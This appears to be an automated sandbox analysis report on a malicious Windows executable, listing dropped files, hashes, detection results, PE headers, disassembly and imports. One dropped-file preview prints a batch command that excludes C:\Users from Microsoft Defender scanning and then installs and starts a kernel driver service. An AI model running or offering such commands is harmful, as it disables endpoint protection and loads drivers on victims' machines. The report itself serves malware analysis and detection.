                                                                                                                                Entropy (8bit):4.820351746235622
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:rYGnyiMMQ75ieGgdEYlRALolXlXINbaH1BYPWND1Qozn:8GnGMQ7hu+m2XlXI+BYONe2
                                                                                                                                MD5:D62B11DC4DC821EF23260E5B0E74A835
                                                                                                                                SHA1:CDFF2004CB9EF149F75FAE296F50F4FBFEFB2E84
                                                                                                                                SHA-256:D1B19B878A3AE98F650843314CC3EF8D681013F6E18E0201CB47A0AFA45FC349
                                                                                                                                SHA-512:27B8292EB318413B965E1C7552165E65F9003D03B15DDC0C5C142420A1A174303F983C268942D7B60C74AC4E8E79E01F83510807FC0C492CABDF4948BC69C625
                                                                                                                                Malicious:false
                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                Preview:start /min cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" & ..sc.exe create truesight binPath="C:\Users\Public\Libraries\truesight.sys" type=kernel &..sc.exe start truesight &..exit....
                                                                                                                                Process:C:\Users\user\Desktop\qDKTsL1y44.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4
                                                                                                                                Entropy (8bit):2.0
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:An:An
                                                                                                                                MD5:3104A32D71DBED6FBECEDFDA3232DDEC
                                                                                                                                SHA1:F8097130148EE5262F52EC496DE769A30A9C2FB3
                                                                                                                                SHA-256:02E04F4B3B2D87DB09E591281D198DB8823038D64C314FB6591DC26A6F872309
                                                                                                                                SHA-512:DBC4471D8CE97AF4F55CDA6BDB87DA32733529EB78E08305B36E3527D7287F1E0E402DF45D771A980658FCA9AB20FF1A1BB5783DE6CBC8B4310416F02B5B6FDE
                                                                                                                                Malicious:false
                                                                                                                                Preview:68..
                                                                                                                                Process:C:\Users\user\Desktop\qDKTsL1y44.exe
                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):131648
                                                                                                                                Entropy (8bit):5.225468064273746
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3072:zar2xXibKcf5K67+k02XbFbosspwUUgcR:Nibl7+k02XZb9UA
                                                                                                                                MD5:231CE1E1D7D98B44371FFFF407D68B59
                                                                                                                                SHA1:25510D0F6353DBF0C9F72FC880DE7585E34B28FF
                                                                                                                                SHA-256:30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
                                                                                                                                SHA-512:520887B01BDA96B7C4F91B9330A5C03A12F7C7F266D4359432E7BACC76B0EEF377C05A4361F8FA80AD0B94B5865699D747A5D94A2D3DCDB85DABF5887BB6C612
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Joe Sandbox View:
                                                                                                                                • Filename: nWiLCvdU0P.exe, Detection: malicious, Browse
                                                                                                                                • Filename: Dwx4h2MQ2s.exe, Detection: malicious, Browse
                                                                                                                                • Filename: SOA_P990T341_JAN_2024.bat, Detection: malicious, Browse
                                                                                                                                • Filename: rRefN____CMS-221747.bat, Detection: malicious, Browse
                                                                                                                                • Filename: SWIFT_MESSAGE.bat, Detection: malicious, Browse
                                                                                                                                • Filename: Ihfxvzhuopygpt.exe, Detection: malicious, Browse
                                                                                                                                • Filename: Purchase Order.exe, Detection: malicious, Browse
                                                                                                                                • Filename: RFQ 11700.exe, Detection: malicious, Browse
                                                                                                                                • Filename: DocumentsDOC03029314B76858448A444B4C03EEC7E6F.bat, Detection: malicious, Browse
                                                                                                                                • Filename: Swift_Advice.bat.exe, Detection: malicious, Browse
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........GF..)...)...).,.....).,.....).,.....)...(.V.).,.....).,.....).,.....).,.....).Rich..).........................PE..d...^PPT.........."..........D...... ..........@............................. ......z................ ..................................................................@&......4....................................................................................text............................... ..`.imrsiv..................................data...............................@....pdata..............................@..@.idata..............................@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................
                                                                                                                                Process:C:\Users\user\Desktop\qDKTsL1y44.exe
                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):117430
                                                                                                                                Entropy (8bit):5.039733311717682
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:M8ypRiBID3TfyIIXt/9msamG+A5j/oSnKAf0H1Cl7MbiRUiRdI8a9pFpF:M8ypRiK/S/9zG++7nKAf0HfiRdI8khF
                                                                                                                                MD5:96B99E2A886D816C1B98B018ADFE6311
                                                                                                                                SHA1:41F2F29BD8F366781ED1387068150EB2789DBBF8
                                                                                                                                SHA-256:C300A049564EEF6D8BAA136858F1F6F0779003BD1B566D95689883C6935E2BA6
                                                                                                                                SHA-512:6768632B586123B4B7C452C05B871A2474214A5D7DB4A048F7B67BC2CDA9DBF87C2EFAF18BED86666DC145F948A2EDBE3B01949FB75E6A68D813CD18A62BA45A
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                                Joe Sandbox View:
                                                                                                                                • Filename: nWiLCvdU0P.exe, Detection: malicious, Browse
                                                                                                                                • Filename: Dwx4h2MQ2s.exe, Detection: malicious, Browse
                                                                                                                                • Filename: WFRlr0p5IH.exe, Detection: malicious, Browse
                                                                                                                                • Filename: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, Detection: malicious, Browse
                                                                                                                                • Filename: Bjrfyyjj.exe, Detection: malicious, Browse
                                                                                                                                • Filename: PCMNil7wkU.exe, Detection: malicious, Browse
                                                                                                                                • Filename: SecuriteInfo.com.Win32.DropperX-gen.28581.15702.exe, Detection: malicious, Browse
                                                                                                                                • Filename: SCAN_DSC0027929829.PDF..exe, Detection: malicious, Browse
                                                                                                                                • Filename: DF0987890000.scr.exe, Detection: malicious, Browse
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........\......... ..... ...$................<a............................. ................ ..............................................................P..................\........................... ...(................................................................... .................. .P`.............0.......*..............@.p..............@.......2..............@.P@.............P.......8..............@.0@.............`.......<..............@.0@.............p........................p......................>..............@.0@.....................@..............@.0.........X............H..............@.@.........h............J..............@.`.........\............L..............@.0B/4...................N..............@.PB/19..................R..............@..B/31.....%...........................@..B/45.....q...........................@..B/57.....
                                                                                                                                Process:C:\Users\user\Desktop\qDKTsL1y44.exe
                                                                                                                                File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):53696
                                                                                                                                Entropy (8bit):6.830243356027624
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:58GYJAAcoglJBtzCMSS4cTl9zIG3Hzuaq1ocezTBk4/HvAMxkExHs1R9zZ1SP8P:xKAAhYJz53WloceBkGHvxxIzzSPG
                                                                                                                                MD5:F53FA44C7B591A2BE105344790543369
                                                                                                                                SHA1:363068731E87BCEE19AD5CB802E14F9248465D31
                                                                                                                                SHA-256:BFC2EF3B404294FE2FA05A8B71C7F786B58519175B7202A69FE30F45E607FF1C
                                                                                                                                SHA-512:55B7B7CDA3729598F0EA47C5C67761C2A6B3DC72189C5324F334BDF19BEF6CE83218C41659BA2BC4783DAA8B35A4F1D4F93EF33F667F4880258CD835A10724D9
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...rp..rp..rp..)...vp..)...wp..)...qp..rp..$p..)...up......|p......sp......sp..Richrp..................PE..d...}..d.........."......X..."......p..........@...........................................A................................................\...(............p..D....~...S......l...@I..8............................I...............@..X............................text....-.......................... ..h.rdata.......@.......2..............@..H.data... ....`.......D..............@....pdata..D....p.......H..............@..HPAGE.................N.............. ..`INIT.................l.............. ..b.rsrc................x..............@..B.reloc..l............|..............@..B........................................................................................................................................................................................
                                                                                                                                Process:C:\Users\user\Desktop\qDKTsL1y44.exe
                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):175800
                                                                                                                                Entropy (8bit):6.631791793070417
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3072:qjyOm0e6/bIhbuwxlEb1MpG+xUEyAn0fYuDGOpPXFZ7on+gUxloDMq:qjyl6ebX45OG+xUEWfYUGOpPXFZ7on+G
                                                                                                                                MD5:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                                SHA1:2A001C30BA79A19CEAF6A09C3567C70311760AA4
                                                                                                                                SHA-256:BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
                                                                                                                                SHA-512:C7F5BAAD732424B975A426867D3D8B5424AA830AA172ED0FF0EF630070BF2B4213750E123A36D8C5A741E22D3999CA1D7E77C62D4B77D6295B20A38114B7843C
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....>.{..................................... ....@.......................... .......c........... ..............................................................H....................................................................................text............................... ..`.data........ ...P..................@....tls.................`..............@....rdata...............b..............@..P.idata... ...........d..............@..@.edata...............|..8...,...@...@..@
                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                Entropy (8bit):7.567222542176421
                                                                                                                                TrID:
                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.81%
                                                                                                                                • Windows Screen Saver (13104/52) 0.13%
                                                                                                                                • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                File name:qDKTsL1y44.exe
                                                                                                                                File size:2'088'448 bytes
                                                                                                                                MD5:42f93ef4ac4943f328a1518bde3c333a
                                                                                                                                SHA1:7bca2b97fe0136a6787a1f08903e723a7b2a17c1
                                                                                                                                SHA256:60e73c48b9559b07ba1aee9fe48e0185a2686e5b88407c590f60535ff36f85db
                                                                                                                                SHA512:f3ebb6f511d27724b69d6495bf07c7ad39bddf4c4eb3611b986faf89920e84f5e4ccf709ec4d9797a2d4976f3694163afaeae61a24174cde54d8f33fc44487fb
                                                                                                                                SSDEEP:49152:Tv5bdj3QfVJ9zq23znSFZyeyTDLudOybI:Tv5Rj30VjSnye4eOH
                                                                                                                                TLSH:43A5E13AED8346BEC03725B9477353E8A93E2F31FD54D4A626902DB46F7C08D6427682
                                                                                                                                File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                                Icon Hash:9496969696898953
                                                                                                                                Entrypoint:0x46c748
                                                                                                                                Entrypoint Section:.itext
                                                                                                                                Digitally signed:false
                                                                                                                                Imagebase:0x400000
                                                                                                                                Subsystem:windows gui
                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                DLL Characteristics:
                                                                                                                                Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                                TLS Callbacks:
                                                                                                                                CLR (.Net) Version:
                                                                                                                                OS Version Major:4
                                                                                                                                OS Version Minor:0
                                                                                                                                File Version Major:4
                                                                                                                                File Version Minor:0
                                                                                                                                Subsystem Version Major:4
                                                                                                                                Subsystem Version Minor:0
                                                                                                                                Import Hash:c1225307ef24f914c7a8882eec046afb
                                                                                                                                Instruction
                                                                                                                                push ebp
                                                                                                                                mov ebp, esp
                                                                                                                                add esp, FFFFFFF0h
                                                                                                                                mov eax, 0046AECCh
                                                                                                                                call 00007FB8B0777B99h
                                                                                                                                mov eax, dword ptr [005E4B78h]
                                                                                                                                mov eax, dword ptr [eax]
                                                                                                                                call 00007FB8B07CA4F9h
                                                                                                                                mov ecx, dword ptr [005E4C78h]
                                                                                                                                mov eax, dword ptr [005E4B78h]
                                                                                                                                mov eax, dword ptr [eax]
                                                                                                                                mov edx, dword ptr [0046A980h]
                                                                                                                                call 00007FB8B07CA4F9h
                                                                                                                                mov eax, dword ptr [005E4B78h]
                                                                                                                                mov eax, dword ptr [eax]
                                                                                                                                call 00007FB8B07CA56Dh
                                                                                                                                call 00007FB8B0775A08h
                                                                                                                                lea eax, dword ptr [eax+00h]
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x1e90000x2a4c.idata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x1f60000x11200.rsrc
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x1ee0000x7140.reloc
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x1ed0000x18.rdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x1e97f40x68c.idata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                .text0x10000x6a0cc0x6a200eeedffb624154eabef831b36023ebcf1False0.5259289421378092data6.532577898390433IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                .itext0x6c0000x7900x8002ca692cd41dabaf1bf0a66d9b95ced2eFalse0.609375data6.0818258754024965IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                .data0x6d0000x177d180x177e00e39540676c83245ed457bb02e63022bbFalse0.7699859182740273data7.599782066061116IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                .bss0x1e50000x3a700x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                .idata0x1e90000x2a4c0x2c00fe74e44a0f0bdfabab4435d69a5fb56dFalse0.3075284090909091data5.08456461499419IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                .tls0x1ec0000x340x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                .rdata0x1ed0000x180x20026cb50fa279783f3d3e80c312cb91870False0.05078125data0.2108262677871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                .reloc0x1ee0000x71400x7200f8c4ea6da79464b2da506e47ee96118bFalse0.6161595394736842data6.670022137192809IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                .rsrc0x1f60000x112000x1120076ffb9fe3c37b22ec28d640cbe717b67False0.32602931113138683data5.744730086699006IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                RT_CURSOR0x1f67700x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                                                RT_CURSOR0x1f68a40x134dataEnglishUnited States0.4642857142857143
                                                                                                                                RT_CURSOR0x1f69d80x134dataEnglishUnited States0.4805194805194805
                                                                                                                                RT_CURSOR0x1f6b0c0x134dataEnglishUnited States0.38311688311688313
                                                                                                                                RT_CURSOR0x1f6c400x134dataEnglishUnited States0.36038961038961037
                                                                                                                                RT_CURSOR0x1f6d740x134dataEnglishUnited States0.4090909090909091
                                                                                                                                RT_CURSOR0x1f6ea80x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                                                RT_ICON0x1f6fdc0x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 3779 x 3779 px/m0.5045081967213115
                                                                                                                                RT_ICON0x1f79640x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m0.47115384615384615
                                                                                                                                RT_ICON0x1f8a0c0x5488Device independent bitmap graphic, 72 x 144 x 32, image size 20736, resolution 3779 x 3779 px/m0.31012014787430686
                                                                                                                                RT_ICON0x1fde940x67e8Device independent bitmap graphic, 80 x 160 x 32, image size 25600, resolution 3779 x 3779 px/m0.3042105263157895
                                                                                                                                RT_STRING0x20467c0x3fcdata0.4
                                                                                                                                RT_STRING0x204a780xa8data0.7202380952380952
                                                                                                                                RT_STRING0x204b200x15cdata0.5545977011494253
                                                                                                                                RT_STRING0x204c7c0x470data0.39348591549295775
                                                                                                                                RT_STRING0x2050ec0x380data0.38504464285714285
                                                                                                                                RT_STRING0x20546c0x3a8data0.39316239316239315
                                                                                                                                RT_STRING0x2058140x3e0data0.34576612903225806
                                                                                                                                RT_STRING0x205bf40x214data0.49624060150375937
                                                                                                                                RT_STRING0x205e080xccdata0.6274509803921569
                                                                                                                                RT_STRING0x205ed40x194data0.5643564356435643
                                                                                                                                RT_STRING0x2060680x3c4data0.3288381742738589
                                                                                                                                RT_STRING0x20642c0x338data0.42961165048543687
                                                                                                                                RT_STRING0x2067640x294data0.42424242424242425
                                                                                                                                RT_RCDATA0x2069f80x10data1.5
                                                                                                                                RT_RCDATA0x206a080x274data0.7468152866242038
                                                                                                                                RT_RCDATA0x206c7c0x2cfDelphi compiled form 'TForm1'0.6050069541029207
                                                                                                                                RT_GROUP_CURSOR0x206f4c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                RT_GROUP_CURSOR0x206f600x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                RT_GROUP_CURSOR0x206f740x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                RT_GROUP_CURSOR0x206f880x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                RT_GROUP_CURSOR0x206f9c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                RT_GROUP_CURSOR0x206fb00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                RT_GROUP_CURSOR0x206fc40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                RT_GROUP_ICON0x206fd80x3edata0.8870967741935484
                                                                                                                                DLLImport
                                                                                                                                oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                                advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                                                user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                                                                                                                                kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetTickCount, QueryPerformanceCounter, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                                                                                                kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                                                user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, ValidateRect, UpdateWindow, UnregisterClassA, UnionRect, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetKeyboardState, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCaretPos, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindowEx, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, IsCharAlphaNumericA, IsCharAlphaA, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDoubleClickTime, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCaretPos, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumClipboardFormats, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DestroyCaret, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, CreateCaret, CloseClipboard, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                                                gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWindowExtEx, SetWinMetaFileBits, SetViewportOrgEx, SetViewportExtEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PolyPolyline, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExtTextOutA, ExtCreatePen, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
                                                                                                                                version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                                                                kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryExA, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalLock, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                                                                                advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                                                                                                                                oleaut32.dllGetErrorInfo, SysFreeString
                                                                                                                                ole32.dllCoUninitialize, CoInitialize
                                                                                                                                kernel32.dllSleep
                                                                                                                                oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
